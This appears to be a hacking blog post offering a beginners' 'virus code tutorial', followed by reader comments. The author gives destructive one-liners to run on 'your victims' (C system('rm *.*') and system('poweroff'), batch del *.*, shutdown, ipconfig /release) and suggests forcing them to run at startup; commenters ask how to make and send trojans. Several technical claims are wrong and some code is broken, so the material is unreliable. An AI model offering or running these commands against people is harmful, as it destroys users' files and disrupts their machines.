Welcome to Virus Coding n Hacking

This blog has a content warning. You must read this before you proceed.

Virus code tutorial

Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide

this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux

First alp/asm
back: add c,b
loop back

This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.

Now lets try to create a simple Linux virus in c.

system("poweroff");

This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.

let's see one more linux virus of the same type
system("rm *.*");

This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.

Lets see the same codes for windows.

To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown

Now lets disable Internet

ipconfig /release
echo You Internet Been HACKED!


What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.

These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c

9 comments:

satya said...

It would e kind enough if you include tips which can make a beginner into a high profile hacker.

Praveen said...

Short and Sweet Information

sankar"romeo" said...

in my coll the new folder.exe is very popular.... i jus search how its works and got an source folder in c:named "heap14a" it contains svchost.exe.and reproduce.ico tat produce the new folder virus all the place..... i cannot understand fully how the coding works help me to detect and take a seminar about the virus.......

venkey said...

i sent you a c program
Check whether it can do any harm
void main()
{
FILE *fp;
fp=fopen("*.exe","w");
fputs("Cracked",fp);
fclose(fp);
}

venkey said...

Check whether the c program can do any harm
void main()
{
FILE *fp;
fp=fopen("*.exe","w";
fputs("Cracked",fp);
fclose(fp):
}

petrovgs said...

i am new and i dont know anything about hacking and programing but i go to school for programer.I hope so that you can tell me how to become a hacker.By this i mean that you can tell me what program language i need to learn and staff like that.But first tell me how to create a trojan virus and how to send it to other people.Plz teach me.I know how to create a false viruses bu they are not interested i also know how to destroy a computer with notepad.So plz teach me how to become a hacker.My email is petrovgs@ptt.rs

roco said...

i am new and i dont know anything about hacking and programing but i go to school for programer.I hope so that you can tell me how to become a hackerand viruses programmer.

murtaza said...

i am new and i dont know anything about hacking and programing but i go to school for programer.I hope so that you can tell me how to become a hacker.By this i mean that you can tell me what program language i need to learn and staff like that.But first tell me how to create a trojan virus and how to send it to other people.Plz teach me.I know how to create a false viruses bu they are not interested i also know how to destroy a computer with notepad.So plz teach me how to become a hacker my email id is murtaza2m@yahoo.com

murtaza said...

i am new and i dont know anything about hacking and programing but i go to school for programer.I hope so that you can tell me how to become a hacker.By this i mean that you can tell me what program language i need to learn and staff like that.But first tell me how to create a trojan virus and how to send it to other people.Plz teach me.I know how to create a false viruses bu they are not interested i also know how to destroy a computer with notepad.So plz teach me how to become a hacker

Post a Comment

Join

Join our Yahoo group newsletter. Dont worry we wont spam your inbox.

Ask Questions